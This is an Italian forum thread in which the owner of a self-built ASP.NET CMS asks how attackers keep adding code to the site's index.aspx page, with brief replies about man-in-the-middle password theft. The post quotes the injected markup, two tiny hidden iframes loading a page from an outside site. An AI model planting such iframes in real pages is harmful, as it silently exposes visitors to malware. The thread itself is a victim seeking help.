Ho un sito web fatto un cms in casa che mi viene hackerato ma non riesco a capire in che modo.
Non è un problema di sql injection. Ho preso tutte le precauzioni del caso.
Mi ritrovo nella mia pagina index.aspx del codice aggiunto:
<iframe src="http://firmamag.com/wp-content/plugins/zeatchyaova/hellpp.html" frameborder="0" width="2" height="3"></iframe><iframe src="http://firmamag.com/wp-content/plugins/zeatchyaova/hellpp.html" width="2" height="3"></iframe></div>

Come fanno?
Fisicamente dovrebbero aprire la pagina e aggiungere manualmente il codice.

la parte cms lavora per querystring e secondo la voce del menù chiamata visualizza i contenuti collegati.
Dopo aver recuperato la stringa del querystring controllo se c'è codice sql injection e se c'è vado in eccezione.
Ripeto non è un problema di sql injection ma un problema che hanno aggiunto codice nel markup della pagina aspx.
Come fanno?

Se è possibile mettere tutto sotto certificazione, ovviamente si può avere una protezione ottimale, in caso contrario basta un man in the middle per poter sapere eventuali password, con tempi, mezzi e conoscenze dovute.

laurar181 ha scritto:

Non ho capito bene cosa voglia dire questo:
" in caso contrario basta un man in the middle per poter sapere eventuali password, con tempi, mezzi e conoscenze "

Ciao leggi quest'articolo che ti spiega alcune cosucce sull'argomento: Uomo nel mezzo...